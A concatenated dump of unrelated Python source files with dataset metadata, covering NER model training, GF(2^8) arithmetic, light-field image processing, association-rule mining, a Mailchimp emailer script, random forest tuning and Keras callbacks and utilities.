 '''\n    Load the file and parse it\n    :param file: file name\n    :return: parallel lists of tokens and their tags\n    '''\n    with open(file) as fopen:\n        texts = fopen.read().split('\\n')\n\n    left, right = [], []\n    for text in texts:\n        if '-DOCSTART' in text or not len(text):\n            continue\n        splitted = text.split()\n        left.append(splitted[0])\n        right.append(splitted[-1])\n    return left, right\n\n\ndef process_string(string):\n    '''\n    :param string:\n    :return:\n    '''\n    string = re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()\n    return ' '.join([to_title(y.strip()) for y in string])\n\n\n
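# Editor's note (illustrative): process_string('LONDON 1996-08-30') returns\n# 'London 1996-08-30' -- all-caps tokens are title-cased by to_title below,\n# everything else passes through unchanged.\n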
def to_title(string):\n    if string.isupper():\n        string = string.title()\n    return string\n\n\ndef parse_XY(texts, labels):\n    '''\n    Build the tag, word and character vocabularies, and convert the text into id sequences\n    :param texts: list of word tokens\n    :param labels: list of tags\n    :return: sequence of word ids, sequence of tag ids\n    '''\n    global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n    X, Y = [], []\n    for no, text in enumerate(texts):\n        text = text.lower()  # lowercase the current word\n        tag = labels[no]  # the corresponding tag\n        for c in text:  # character vocabulary\n            if c not in char2idx:\n                char2idx[c] = char_idx\n                char_idx += 1\n        if tag not in tag2idx:  # tag vocabulary\n            tag2idx[tag] = tag_idx\n            tag_idx += 1\n        Y.append(tag2idx[tag])  # tag id of the current word\n        if text not in word2idx:  # word vocabulary\n            word2idx[text] = word_idx\n            word_idx += 1\n        X.append(word2idx[text])  # word id of the current word\n    return X, np.array(Y)\n\n\ndef iter_seq(x):\n    return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)])\n\n\ndef to_train_seq(*args):\n    '''\n    :param args: sequences of word ids and tag ids\n    :return:\n    '''\n    return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n    '''\n    The input arrives in blocks of 50 word ids;\n    convert every word in each block into its character-id sequence\n    :param batch:\n    :return:\n    '''\n    x = [[len(idx2word[i]) for i in k] for k in batch]  # length of every word\n    maxlen = max([j for i in x for j in i])  # maximum word length\n    temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n\n    for i in range(batch.shape[0]):\n        for k in range(batch.shape[1]):\n            for no, c in enumerate(idx2word[batch[i, k]]):\n                temp[i, k, -1-no] = char2idx[c]\n    return temp  # [number of blocks, words per block, maxlen (character ids per word, right-aligned)]\n\n\ndef pred2label(pred):\n    # convert predicted ids back to tag labels\n    out = []\n    for pred_i in pred:\n        out_i = []\n        for p in pred_i:\n            out_i.append(idx2tag[p])\n        out.append(out_i)\n    return out\n\n\nif __name__ == '__main__':\n    left_train, right_train = parse('./data/eng.train')\n    left_test, right_test = parse('./data/eng.testa')\n    # print(left_train[:10])\n    # print(right_train[:10])\n\n    word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}  # word vocabulary\n    tag2idx = {'PAD': 0}  # tag vocabulary\n    char2idx = {'PAD': 0}\n    word_idx = 3\n    tag_idx = 1\n    char_idx = 1\n\n    train_X, train_Y = parse_XY(left_train, right_train)\n    test_X, test_Y = parse_XY(left_test, right_test)\n    # print(train_X[:20])\n    # print(train_Y[:20])\n\n    idx2word = {idx: tag for tag, idx in word2idx.items()}\n    idx2tag = {i: w for w, i in tag2idx.items()}\n\n    seq_len = 50\n\n    X_seq, Y_seq = to_train_seq(train_X, train_Y)  # one segment per 50 tokens\n    X_char_seq = generate_char_seq(X_seq)\n    print(X_seq.shape)  # (203571, 50)\n    print(X_char_seq.shape)  # (203571, 50, 61)\n\n    X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n    X_char_seq_test = generate_char_seq(X_seq_test)\n    print(X_seq_test.shape)  # (51312, 50)\n    print(X_char_seq_test.shape)  # (51312, 50, 27)\n\n    train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n    test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n\n    tf.reset_default_graph()\n    sess = tf.Session()\n\n    dim_word = 64\n    dim_char = 128\n    dropout = 0.8\n    learning_rate = 1e-3\n    hidden_size_char = 128\n    hidden_size_word = 128\n    num_layers = 2\n    batch_size = 32\n\n    model = Model(dim_word, dim_char, dropout, learning_rate,\n                  hidden_size_char, hidden_size_word, num_layers)\n    sess.run(tf.global_variables_initializer())\n\n    for e in range(3):\n        train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n        for i in range(0, len(train_X), batch_size):\n\n            batch_x = train_X[i: min(i + batch_size, train_X.shape[0])]\n            batch_char = train_char[i: min(i + batch_size, train_X.shape[0])]\n            batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])]\n\n            acc, cost, _ = sess.run(\n                [model.accuracy, model.cost, model.optimizer],\n                
feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run(\n [model.accuracy, model.cost],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n\n print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(\n sess.run(model.tags_seq,\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n },\n )\n )\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n\n print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel()))","sub_path":"Entity_Posing/001-rnn+lstm+crf.py","file_name":"001-rnn+lstm+crf.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"454372911","text":"import subprocess\r\n\r\nimport sys\r\nfrom time import time, sleep\r\nimport matplotlib.pyplot\r\n\r\n\r\nNum = int(sys.argv[1])\r\nname = str(sys.argv[2])\r\n\r\nfor i in range(Num):\r\n subprocess.call(['python', 'MultiPro.py', str(i), str(Num), name])\r\n\r\nresult = 0\r\nt = []\r\n\r\nfor i in range(Num):\r\n file = open('Task' + str(i) + '.txt', 'r')\r\n result = result ^ int(file.readline())\r\n t.append(float(file.readline()))\r\n file.close()\r\n\r\n\r\n\r\nx=[]\r\n\r\nfor i in range(10):\r\n x.append(i)\r\n\r\n\r\n\r\n\r\n\r\nmatplotlib.pyplot.plot(x,t)\r\nmatplotlib.pyplot.xlabel(\"Iteration\")\r\nmatplotlib.pyplot.ylabel(\"Time\")\r\nmatplotlib.pyplot.show()\r\n\r\nfile = open('FinalResult_proj1.txt', 'w')\r\nfile.write('\\n'.join([(\"FinalResult:\"),str(result),(\"Time:\"), str(max(t))]))\r\nfile.close()\r\n","sub_path":"Project1/Os_Project1_main.py","file_name":"Os_Project1_main.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255916756","text":"def gmod(n,p): # 283 is standard, see gmultiply\n # leave leading '0b'\n b = len(bin(p))\n \n # repeatedly\n while True:\n if n < 256:\n return n\n # shift p out to match n\n d = p << (len(bin(n)) - b)\n n = n ^ d\n\ndef gmultiply(a,b,p=283):\n # for efficiency\n # if a < b:\n # a,b = b,a\n \n # the digits of binary b (reversed)\n s = bin(b)[2:][::-1]\n \n r = 0\n # for each digit in b (reversed)\n # add a to accumulated result\n # where a is left-shifted \n # by digit's place in b (reversed)\n for c in s:\n if c == '1':\n r = r ^ a # addition\n a = a << 1 # left-shift\n 
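# editor's note: the carry-less product r can be up to 15 bits wide; gmod reduces\n    # it modulo p (default 283 = 0x11B, the AES polynomial x^8 + x^4 + x^3 + x + 1)\n    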
return gmod(r,p)\n\ndef xor_reduce(L):\n r = 0\n for n in L:\n r = r ^ n\n return r\n","sub_path":"AES-math/code/gmath.py","file_name":"gmath.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"475218475","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 28 12:44:55 2016\r\n\r\n@author: sims01\r\n\"\"\"\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef padLightFieldData(originalArray, pixPer_ulens_i, rawLF_iDim, rawLF_jDim, padAxis): \r\n # calculate number of virtual pixels\r\n virPix_iDim = int(np.floor(np.divide(rawLF_iDim, pixPer_ulens_i)))\r\n \r\n # calc modulus\r\n # corresponds to number rows/ cols req\r\n pixelDeficiency = np.mod(rawLF_iDim, pixPer_ulens_i)\r\n \r\n if pixelDeficiency != 0:\r\n \r\n # add 1 to the number of virtualPix\r\n virPix_iDim = virPix_iDim + 1\r\n \r\n # calculate number of additional pixels required\r\n reqAddPix = pixPer_ulens_i - pixelDeficiency\r\n \r\n # create appropriate zero array\r\n addPixArray = np.zeros([reqAddPix, rawLF_jDim])\r\n \r\n if padAxis == 0:\r\n # pad array with required number of pixels\r\n paddedLightFieldData = np.concatenate((originalArray,addPixArray),axis=padAxis)\r\n \r\n if padAxis == 1:\r\n paddedLightFieldData = np.concatenate((originalArray,addPixArray.T),axis=padAxis)\r\n \r\n else:\r\n paddedLightFieldData = originalArray\r\n \r\n return paddedLightFieldData, virPix_iDim\r\n\r\ndef genSupApArray(virPixArray, subApArray, pixPer_uLensX, pixPer_uLensY):\r\n for apIndX in range(pixPer_uLensX):\r\n for apIndY in range(pixPer_uLensY):\r\n subApArray[:,:,apIndX,apIndY] = virPixArray[apIndX,:,apIndY,:];\r\n return \r\n\r\n#def showSupApImSequence(apCoordsX, apCoordsY, subApArray):\r\n# # loop all sub-aperture images\r\n# for apIndX in (apCoordsX):\r\n# for apIndY in (apCoordsY):\r\n# subApIm = subApArray[:,:,apIndX,apIndY]\r\n# plt.imshow(subApIm, cmap = 'gray')\r\n# plt.xticks([]), plt.yticks([])\r\n# plt.pause(.1) \r\n# plt.show()\r\n# return\r\n\r\ndef showImSequence(imInCoordsX, imInCoordsY, imArray, imType):\r\n # loop through all images\r\n for imIndX in (imInCoordsX):\r\n for imIndY in (imInCoordsY):\r\n if imType == 'virPix':\r\n subIm = imArray[:,imIndX,:,imIndY]\r\n if imType == 'subAp':\r\n subIm = imArray[:,:,imIndX,imIndY]\r\n plt.imshow(subIm, cmap = 'gray')\r\n plt.xticks([]), plt.yticks([])\r\n plt.pause(.1) \r\n plt.show()\r\n return","sub_path":"lfImRecon.py","file_name":"lfImRecon.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"285153820","text":"#import libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#import apriori functionn\nfrom apyori import apriori\n\n#read dataset\ndataset=pd.read_csv('BreadBasket_DMS.csv')\n\n#drop column of date and column\ndataset=dataset.drop(['Date', 'Time'], axis=1)\n\n#plot pie chart of top 15 selling items \ndataset['Item'].value_counts()[:16].plot.pie()\n\n#initialize transactions\ntransactions=[]\n\n#apply loop\n#for i in range(1,9685):\n# transaction.append([str(dataset['Item'][j]) if dataset['Transaction'][j]==str(i) for j in range(0,21293)])\n\n#convert series to list\ndef convert_tolist(arg):\n# lst=arg.values\n transactions.append(list(set(arg)))\n \n \n\n#convert dataset to lists of lists\ndataset.groupby(['Transaction'])['Item'].apply(convert_tolist)\n\n#apply apriori on the 
dataset\nrules=apriori(transactions, min_support=0.0025, min_confidence=0.2, min_lift=3)\n\n#convert rules to list\nresults=list(rules)\n\n\n#print item in sophisticated way\nfor item in results:\n\n # first index of the inner list\n # Contains base item and add item\n pair = item[0] \n items = [x for x in pair]\n print(\"Rule: \" + items[0] + \" -> \" + items[1])\n\n #second index of the inner list\n print(\"Support: \" + str(item[1]))\n\n #third index of the list located at 0th\n #of the third index of the inner list\n\n print(\"Confidence: \" + str(item[2][0][2]))\n print(\"Lift: \" + str(item[2][0][3]))\n print(\"=====================================\")\n \n \n\n","sub_path":"Day 23/BreadBasket_DMS.py","file_name":"BreadBasket_DMS.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"346438737","text":"'''\nCreated on Apr 30, 2018\nCopyright (c) 2017-2018 Alberto Monge Roffarello\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License\n@author: alberto-mr\n'''\n\n\nimport requests\nimport json\n\n\ndef print_tasks_from_server():\n '''\n Get the list of tasks from the server in JSON\n '''\n\n #get JSON from server\n resp = requests.get('http://127.0.0.1:5000/api/v1.0/tasks')\n if resp.status_code != 200:\n print(\"Error: the list of tasks is not available at this moment.\")\n else:\n #for each element in tasks we print the content\n for task in json.loads(resp.text)['tasks']:\n print(task['description'] + \" \" +str(task['urgent']))\n\n\nif __name__ == '__main__':\n # main program\n print_tasks_from_server()","sub_path":"python-lab7/task_client.py","file_name":"task_client.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"329576483","text":"#!/usr/bin/env python\n\n\"\"\"\nDescription:\n For every lot the script will:\n - look for latest briefs for Digital Outcomes and Specialists\n - if there are new briefs on that lot:\n - it will create a Mailchimp campaign\n - it will set the content of the campaign to be the briefs found\n - it will send that campaign to the list_id as referenced in the `lots` variable\n - if there are no new briefs on that lot no campaign is created or sent\n\n Number of days tells the script for how many days before current date it should include in its search for briefs\n example: if you run this script on a Wednesday and set number of days=1,\n then it will only include briefs from Tuesday (preceding day).\n example2: if you run it on Wednesday and set number of days=3,\n then it will include all briefs published on Sunday, Monday and Tuesday.\n By default, the script will send 3 days of briefs on a Monday (briefs from Fri, Sat, Sun) and 1 day on all other\n days. 
This can be overridden as described above.\n\n    For testing purposes, you can override the list ID so you can send it to yourself only, as\n    we have set up a testing list with ID \"096e52cebb\"\n\n    If you only need to send opportunities for one lot rather than all of them, you can also do this via the command\n    line. Note: this may come in useful if the script was to fail halfway and you wish to continue from the lot which\n    failed.\n\nUsage:\n    send-dos-opportunities-email.py <stage> <mailchimp_username> <mailchimp_api_key> <framework_slug>\n        [--number_of_days=<number_of_days>] [--list_id=<list_id>] [--lot_slug=<lot_slug>]\n\nExample:\n    send-dos-opportunities-email.py\n    preview user@gds.gov.uk 7483crh87h34c3 digital-outcomes-and-specialists-3\n    --number_of_days=3 --list_id=988972hse --lot_slug=digital-outcomes\n\"\"\"\n\nimport sys\n\nfrom datetime import date\n\nfrom docopt import docopt\nfrom dmapiclient import DataAPIClient\n\nsys.path.insert(0, '.')\nfrom dmscripts.helpers.auth_helpers import get_auth_token\nfrom dmscripts.send_dos_opportunities_email import main\nfrom dmscripts.helpers import logging_helpers\nfrom dmutils.email.dm_mailchimp import DMMailChimpClient\nfrom dmutils.env_helpers import get_api_endpoint_from_stage\n\n\nlogger = logging_helpers.configure_logger()\n\n\nlist_ids = {\n    'digital-outcomes-and-specialists-2': {\n        'digital-specialists': \"30ba9fdf39\",\n        'digital-outcomes': \"97952fee38\",\n        'user-research-participants': \"e6b93a3bce\",\n    },\n    'digital-outcomes-and-specialists-3': {\n        'digital-specialists': \"bee802d641\",\n        'digital-outcomes': \"5c92c78a78\",\n        'user-research-participants': \"34ebe0bffa\",\n    }\n}\n\nif __name__ == \"__main__\":\n    arguments = docopt(__doc__)\n    framework_slug = arguments['<framework_slug>']\n    lots = [\n        {\n            \"lot_slug\": \"digital-specialists\",\n            \"lot_name\": \"Digital specialists\",\n            \"list_id\": list_ids[framework_slug]['digital-specialists']\n        },\n        {\n            \"lot_slug\": \"digital-outcomes\",\n            \"lot_name\": \"Digital outcomes\",\n            \"list_id\": list_ids[framework_slug]['digital-outcomes']\n        },\n        {\n            \"lot_slug\": \"user-research-participants\",\n            \"lot_name\": \"User research participants\",\n            \"list_id\": list_ids[framework_slug]['user-research-participants']\n        }\n    ]\n\n    # Override number of days\n    if arguments.get(\"--number_of_days\"):\n        number_of_days = int(arguments['--number_of_days'])\n    else:\n        day_of_week = date.today().weekday()\n        if day_of_week == 0:\n            number_of_days = 3  # If Monday, then 3 days of briefs\n        else:\n            number_of_days = 1\n\n    # Override list for non-production environment\n    if arguments['<stage>'] != \"production\":\n        logger.info(\n            \"The environment is not production. 
Emails will be sent to the test list unless you set the list id manually.\"\n        )\n        for lot in lots:\n            lot.update({\"list_id\": \"096e52cebb\"})\n\n    # Override list id\n    if arguments.get(\"--list_id\"):\n        for lot in lots:\n            lot.update({\"list_id\": arguments[\"--list_id\"]})\n\n    # Override lot\n    if arguments.get(\"--lot_slug\"):\n        lots = [lot for lot in lots if lot[\"lot_slug\"] == arguments[\"--lot_slug\"]]\n\n    api_url = get_api_endpoint_from_stage(arguments['<stage>'])\n    data_api_client = DataAPIClient(api_url, get_auth_token('api', arguments['<stage>']))\n\n    dm_mailchimp_client = DMMailChimpClient(arguments['<mailchimp_username>'], arguments['<mailchimp_api_key>'], logger)\n\n    for lot_data in lots:\n        ok = main(\n            data_api_client=data_api_client,\n            mailchimp_client=dm_mailchimp_client,\n            lot_data=lot_data,\n            number_of_days=number_of_days,\n            framework_slug=framework_slug,\n        )\n        if not ok:\n            sys.exit(1)\n","sub_path":"scripts/send-dos-opportunities-email.py","file_name":"send-dos-opportunities-email.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"103726658","text":"# coding=utf-8\nimport os\n\n\n# Collect the paths of all videos under a directory and return them as a list\ndef findAllVideos(root_dir):\n    paths = []\n    # walk the directory tree\n    for parent, dirname, filenames in os.walk(root_dir):\n        for filename in filenames:\n            # only the two most common video formats are selected here\n            if filename.endswith(\".mp4\") or filename.endswith(\".avi\") or filename.endswith(\".MP4\") or filename.endswith(\".AVI\"):\n                paths.append(parent + \"\\\\\" + filename)\n    return paths\n\n\n# directory specified by the user\nroot_dir = input(\"Input the parent path of videos:\\n\")\n\npaths = findAllVideos(root_dir)\n\nfor i in range(len(paths)):\n    print(\"Video\", (i + 1), \"/\", str(len(paths)))\n    command = \"python preview_py3.py \" + '\"' + paths[i] + '\"' + \" 400 \" + str(i + 1) + \".jpg\"\n    print(command)\n    os.system(command)\n    print(\"\\n\")\n","sub_path":"bash_py3.py","file_name":"bash_py3.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"215747101","text":"import pandas as pd\nimport numpy as np\nfrom src.feature_engineering import feature_engineering\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef main():\n    X_train, y_train, scaler = prepare_data()\n    result = rf_grid_search(np.array(X_train), np.array(y_train).ravel())\n    print(result.best_params_, result.best_score_)\n\n\ndef rf_grid_search(X, y):\n    parameters = {'n_estimators': [300],\n                  'max_features': ['auto', 'sqrt', 'log2'],\n                  'max_depth': [None, 3, 5, 10],\n                  'min_samples_split': [2, 3],\n                  'min_samples_leaf': [1, 2, 3]\n                  }\n\n    rf = RandomForestClassifier()\n    clf = GridSearchCV(rf, parameters, scoring='recall', cv=10, verbose=True)\n    clf.fit(X, y)\n\n    return clf\n\n\ndef prepare_data():\n    '''\n    Load the data, perform feature engineering, standardize, train/test split\n    '''\n    df = pd.read_json('data/data.json')\n    df = feature_engineering(df)\n\n    y = df['fraud']\n    X = df.drop('fraud', axis=1)\n\n    cols = [  # 'acct_type',\n        # 'approx_payout_date',\n        'body_length',\n        'channels',\n        # 'country',\n        # 'currency',\n        # 'delivery_method', (text)\n        # 'description', (text)\n        # 'email_domain', (text)\n        # 'event_created',\n        # 'event_end',\n        # 'event_published',\n        # 'event_start',\n        'fb_published',\n        # 'gts',\n        'has_analytics',\n        # 'has_header', (has NaNs, needs cleaning)\n        'has_logo',\n        'listed',\n        # 'name', (text)\n        
'name_length',\n # 'num_order', (transaction)\n # 'num_payouts', (transaction)\n # 'object_id',\n # 'org_desc', (text, Rohit doing NLP )\n # 'org_facebook', (not sure what this is)\n # 'org_name', (text)\n # 'org_twitter', (not sure what this is)\n # 'payee_name', (transaction)\n # 'payout_type', (transaction)\n # 'previous_payouts', (dictionaries)\n # 'sale_duration', (not sure what this is)\n # 'sale_duration2', (not sure what this is)\n 'show_map',\n # 'ticket_types', (feature engineered)\n # 'user_age', (feature engineered)\n # 'user_created',\n # 'user_type',\n # 'venue_address',\n # 'venue_country',\n # 'venue_latitude',\n # 'venue_longitude',\n # 'venue_name',\n # 'venue_state',\n # 'fraud', (feature engineered target)\n 'event_published_dummy',\n # 'approx_payout_date_dt',\n # 'event_created_dt',\n # 'event_end_dt',\n # 'event_start_dt',\n # 'approx_payout_date_hour',\n 'event_created_hour',\n 'event_end_hour',\n 'event_start_hour',\n 'previous_payouts?',\n 'payout_type?',\n 'org_blacklist',\n 'user_age_90',\n 'num_links',\n 'fraud_email_domain',\n 'fraud_venue_country',\n 'fraud_country',\n 'fraud_currency',\n 'total_price',\n 'max_price',\n 'num_tiers']\n\n X_train = df[cols]\n y_train = y\n\n scaler = StandardScaler()\n X_train = pd.DataFrame(scaler.fit_transform(X_train), columns=cols)\n\n return X_train, y_train, scaler\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/random_forest_grid_search.py","file_name":"random_forest_grid_search.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"617730030","text":"from __future__ import print_function\n\n\"\"\"\nExtra set of callbacks.\n\"\"\"\n\nimport random\nimport warnings\nimport numpy as np\nimport logging\n\nfrom keras.callbacks import Callback as KerasCallback\n\n\n###\n# Storing callbacks\n###\nclass StoreModelWeightsOnEpochEnd(KerasCallback):\n def __init__(self, model, fun, epochs_for_save, reload_epoch=0, verbose=0):\n \"\"\"\n In:\n model - model to save\n fun - function for saving the model\n epochs_for_save - number of epochs before the last save\n reload_epoch - number of the epochs trained (only if resuming training)\n \"\"\"\n super(KerasCallback, self).__init__()\n self.model_to_save = model\n self.store_function = fun\n self.epochs_for_save = epochs_for_save\n self.reload_epoch = reload_epoch\n self.verbose = verbose\n\n def on_epoch_end(self, epoch, logs={}):\n epoch += 1\n if(epoch%self.epochs_for_save==0):\n print('')\n self.store_function(self.model_to_save, epoch+self.reload_epoch)\n###\n\n###\n# Printing callbacks\n###\n\n\n\n \n###\n\n###\n# Learning modifiers callbacks\n###\nclass LearningRateReducerWithEarlyStopping(KerasCallback):\n \"\"\"\n Reduces learning rate during the training.\n\n Original work: jiumem [https://github.com/jiumem]\n \"\"\"\n def __init__(self, \n patience=0, lr_decay=1, reduce_rate=0.5, reduce_nb=10, \n is_early_stopping=True, verbose=1):\n \"\"\"\n In:\n patience - number of beginning epochs without reduction; \n by default 0\n lr_decay - minimum number of epochs passed before the last reduction\n reduce_rate - multiplicative rate reducer; by default 0.5\n reduce_nb - maximal number of reductions performed; by default 10\n is_early_stopping - if true then early stopping is applied when\n reduce_nb is reached; by default True\n verbose - verbosity level; by default 1\n \"\"\"\n super(KerasCallback, self).__init__()\n self.patience = patience\n self.wait = 0\n self.best_score = 
-1.\n        self.reduce_rate = reduce_rate\n        self.current_reduce_nb = 0\n        self.reduce_nb = reduce_nb\n        self.is_early_stopping = is_early_stopping\n        self.verbose = verbose\n        self.epsilon = 0.1e-10\n        self.lr_decay = lr_decay\n\n    def on_epoch_end(self, epoch, logs={}):\n        current_score = logs.get('val_acc')\n        if current_score is None:\n            warnings.warn('validation score is off; ' +\n                          'this reducer works only with the validation score on')\n            return\n        if current_score > self.best_score:\n            self.best_score = current_score\n            self.wait = 0\n            if self.verbose > 0:\n                logging.info('---current best val accuracy: %.3f' % current_score)\n        else:\n            if self.wait >= self.patience and self.wait >= self.lr_decay:\n                self.current_reduce_nb += 1\n                if self.current_reduce_nb <= self.reduce_nb:\n                    lr = self.model.optimizer.lr.get_value()\n                    self.model.optimizer.lr.set_value(np.float32(lr*self.reduce_rate))\n                    if self.verbose > 0:\n                        logging.info(\"LR reduction from {0:0.6f} to {1:0.6f}\".\\\n                            format(float(lr), float(lr*self.reduce_rate)))\n                    if float(lr) <= self.epsilon:\n                        if self.verbose > 0:\n                            logging.info('Learning rate too small, learning stops now')\n                        self.model.stop_training = True\n                else:\n                    if self.is_early_stopping:\n                        if self.verbose > 0:\n                            logging.info(\"Epoch %d: early stopping\" % (epoch))\n                        self.model.stop_training = True\n            self.wait += 1\n","sub_path":"keras_wrapper/callbacks_keras_wrapper.py","file_name":"callbacks_keras_wrapper.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"349793245","text":"# 1.0 - Acer 2017/05/17 17:06\n# 2.0 - Acer 2017/11/24 15:51\nimport copy\nimport os\nimport time\nfrom collections import Iterable\nfrom functools import reduce\nfrom subprocess import Popen\n\nimport numpy as np\nfrom keras.callbacks import CSVLogger, ModelCheckpoint\nfrom keras.models import load_model\nfrom keras.utils import vis_utils\n\nimport acerlib.shelve_ext as she\nfrom acerlib import print_ext\n\n\n# ============================================================================ #\n#                               Common Functions                               #\n# ============================================================================ #\ndef check_and_create_path(path):\n    if not os.path.exists(path):\n        os.makedirs(path)\n\n\n# ============================================================================ #\n#                              TensorFlow Control                              #\n# ============================================================================ #\ndef setTensorFlowGpuMemory(ratio):\n    import tensorflow as tf\n    import keras.backend.tensorflow_backend as KTF\n\n    num_threads = os.environ.get('OMP_NUM_THREADS')\n    gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=ratio)\n\n    if num_threads:\n        sessionInfo = tf.Session(config=tf.ConfigProto(\n            gpu_options=gpu_options, intra_op_parallelism_threads=num_threads))\n    else:\n        sessionInfo = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n    KTF.set_session(sessionInfo)\n\n\n# ============================================================================ #\n#                                     Plot                                     #\n# ============================================================================ #\ndef plot_model(m, filename='temp_modelplot.png'):\n    import matplotlib.image as mpimg\n    import matplotlib.pyplot as plt\n\n    vis_utils.plot_model(m, show_shapes=True, to_file=filename)\n\n    # read back the image that was just written; 'filename' may be a\n    # caller-supplied path, so it must not be reset to the default here\n    img = mpimg.imread(filename)\n    try:\n        Popen(['eog', filename])\n    except OSError:\n        plt.imshow(img)\n\n    # --- back up ---\n    # img = Image.open(fName)\n    # img.show()\n    # --------------\n\n\n# 
============================================================================ #\n#                             Command line display                             #\n# ============================================================================ #\ndef print_trainProgress(iEpoch, iBatch, loss):\n    print('Epoch', iEpoch, 'Batch', iBatch, 'loss =', loss, sep='\\t')\n\n\ndef print_evalProgress(iEpoch, iBatch, loss):\n    print('Epoch', iEpoch, 'Batch', iBatch, 'val_loss =', loss, sep='\\t')\n\n\ndef print_loss(iEpoch, iBatch, loss, numFormat='.3e'):\n    \"\"\"\n    :param iEpoch:\n    :param iBatch:\n    :param loss: can be a number, a dict or an iterable of numbers\n    :param numFormat:\n    :return:\n    \"\"\"\n    print('Epoch %d Batch %d' % (iEpoch, iBatch), end=\"\")\n    print('\\t', end=\"\")\n    if isinstance(loss, dict):\n        print_ext.print_dict(loss, numFormat)\n        print('')\n    elif isinstance(loss, Iterable):\n        print('loss: ', end='')\n\n        for x in loss:\n            print('%.3e\\t' % x, end='')\n        print('')\n    else:\n        print(('loss: %' + '.3e') % loss)\n\n\n# ============================================================================ #\n#                                Data Processing                               #\n# ============================================================================ #\ndef batchGenerator(d, batch_size, isLooping=True):\n    \"\"\"\n    Make a batch generator.\n    :param d: multi-dimensional data (a single array, or a list/tuple of arrays)\n    :param batch_size:\n    :param isLooping: if True, restart from the beginning once the data are exhausted\n    \"\"\"\n    nSample = d[0].shape[0] if isinstance(d, (list, tuple)) else d.shape[0]\n    c1 = 0\n    while True:\n        if isinstance(d, (list, tuple)):\n            d_batch = [np.take(x, range(c1, c1 + batch_size), axis=0) for x in d]\n        else:\n            d_batch = np.take(d, range(c1, c1 + batch_size), axis=0)\n        yield d_batch, range(c1, c1 + batch_size)\n\n        if (c1 + 2 * batch_size) > nSample:\n            if isLooping:\n                c1 = 0\n            else:\n                break\n        else:\n            c1 += batch_size\n\n\n# ============================================================================ #\n#                              Model Construction                              #\n# ============================================================================ #\ndef stackLayers(layers):\n    return reduce((lambda x, y: 